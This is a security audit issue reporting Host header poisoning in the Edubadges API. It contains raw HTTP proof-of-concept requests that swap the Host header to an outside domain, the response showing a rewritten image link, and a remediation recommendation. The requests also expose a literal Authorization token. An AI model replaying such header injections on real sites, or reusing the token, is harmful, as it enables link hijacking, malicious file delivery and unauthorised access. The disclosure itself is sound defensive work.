edubadges / audit

Code audit repo for Edubadges

Host header poisoning #9

Open sveeke opened 6 years ago

sveeke commented 6 years ago

The application appears to trust the user-supplied host header.

sveeke commented 6 years ago

threatLevel="Low" type="Host-Header-Poisoning"

The application appears to trust the user-supplied host header which allows the attacker to load a PNG-file from another server because the HTTP Host header value is used to generate an image link. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. ROS also verified that the links in the password reset e-mail are not using the Host Header. This prevents an attacker from stealing password reset tokens.

Original request:

POST /v1/issuer/issuers HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/create
Content-Length: 57523
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"name":"nn","description":"nnn","email":"stefanpentest+blaat6767@gmail.com","url":"https://www.edubadges.nl","image":"

<SNIP>

Example request (changed host to radicallyopensecurity.com):

POST /v1/issuer/issuers HTTP/1.1
Host: radicallyopensecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/create
Content-Length: 57523
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"name":"nn","description":"nnn","email":"stefanpentest+blaat6767@gmail.com","url":"https://www.edubadges.nl","image":"

<SNIP>

Note that in the response the image address is changed to: radicallyopensecurity.com

HTTP/1.1 201 Created
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:19:39 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 925

{"created_at":"2018-06-10T01:19:39.622106Z","created_by":"stefanpentest+blaat6767@gmail.com","name":"nn","slug":"rwygWIDnR1uBB_i1MPwu_g","image":"http://radicallyopensecurity.com/media/uploads/issuers/issuer_logo_47a13e17-51fb-41cb-b6cc-1d12f7b58114.png","email":"stefanpentest+blaat6767@gmail.com","description":"nnn","url":"https://www.edubadges.nl","staff":[{"user":{"first_name":"gg","last_name":"Pentest","email":"stefanpentest+blaat6767@gmail.com","slug":"EQmfGQciRuKCC_LzIamehw"},"role":"owner"}],"json":{"@context":"https://w3id.org/openbadges/v1","description":"nnn","url":"https://www.edubadges.nl","email":"stefanpentest+blaat6767@gmail.com","type":"Issuer","id":"https://badgr-dev2.edubadges.nl/public/issuers/rwygWIDnR1uBB_i1MPwu_g","name":"nn","image":"https://badgr-dev2.edubadges.nl/public/issuers/rwygWIDnR1uBB_i1MPwu_g/image"},"badgeClassCount":0,"recipientGroupCount":0,"recipientCount":0,"pathwayCount":0}

In the Burp proxy a request is sent to the PNG file on the radicallyopensecurity.com server:

GET /media/uploads/issuers/issuer_logo_47a13e17-51fb-41cb-b6cc-1d12f7b58114.png HTTP/1.1
Host: radicallyopensecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


Impact: This will bypass any server security if an attacker is able to control the contents of the file. The attacker could create a malicious PNG file on its server.

Recommendation: The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on.